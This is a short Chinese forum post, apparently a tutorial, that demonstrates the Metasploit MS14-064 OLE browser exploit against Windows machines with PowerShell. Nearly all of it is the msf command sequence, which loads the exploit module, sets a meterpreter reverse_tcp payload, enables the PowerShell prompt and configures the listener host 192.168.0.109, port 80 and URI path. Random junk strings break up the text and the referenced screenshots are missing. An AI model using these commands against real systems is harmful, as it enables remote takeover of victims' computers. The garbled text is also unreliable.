4 k- _1 T! x8 C9 |0 P4 q
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
$ b7 O& Z7 C" m3 M% w
6 d! p( I( S! i1 @3 q0 O; I$ l6 o$ B( l, X) S$ \
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
, t' \1 u6 c% v; r5 s, S
- P) |8 O0 S b6 m" v) E2 z! H
# U- h$ k. Y) }
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
- ~; t- c- U& W, z4 l: z
* o( b8 o) o5 R6 l& |
" Y" i$ w6 k' c) v2 ^ set AllowPowershellPrompt true# ]# D. S* `, j/ q1 {8 X
* N' W4 o, [. D5 n, e" O& L! m% N7 w* n4 N% b" K4 X! @
Set LHOST 192.168.0.109
4 A0 s. o( s. r( l1 ]
+ |1 _* a7 U( S- m% S s
2 O* o0 V8 ^% e" s set SRVHOST 192.168.0.109# i6 |6 v8 @( S% f
4 {# u) \3 k8 Q9 r7 J0 d) ~
, |# z* }7 A( Q
Set uripath share0 S Q' z, b; y) Q7 ]+ d
& a! [. I, V$ G6 ~
, e7 a2 }& Q; M Set srvport 80
: j# z' @) c6 y+ x0 v: i
# @' {. N$ r# f3 D( z5 n) ]) i9 y, }7 |% j: i
: u5 d# E' [9 S0 B$ y
+ E4 d5 D+ d1 e3 W% N3 k+ D& h0 N$ u
+ s& Y5 I' f6 A1 c2 C
8 K) B; A" y; \+ i3 x* S
3 f# ]: v" N2 I a2 Z I6 t# p
! t9 f4 a: i: u
/ {2 O4 a0 k/ J- I$ k- H1 Q9 ?* R; l- ?) N+ T# \
* U" Q! R2 @ |% G+ k
! t' K5 P- k3 J& h& P" \3 y F
5 X2 B; `! P0 b! n0 U
' P( z. ` o" M) o6 {2 U
# E$ N/ k$ y- T8 F+ O" I& j8 w S- M' N8 B2 o9 u
下面我们来访问本地地址如图:1 x5 a' F) z, b9 M
6 W. t( D/ o4 V1 N! ^4 K( H J1 a
" j' k, N& v, i! g
7 u; F% G, T: @* X+ r) m0 E9 M/ W0 B
$ {# t+ O9 C3 i* k; |4 X* f' ?1 v7 g
9 k' @, r) Z/ o# H& O2 h& }
5 K% e" V _- ~, s
. X! {, R; x+ `& e# j( {( ^0 ?$ f+ Z
' ^" y6 w% d% t8 W7 D
- P' h0 a4 G6 V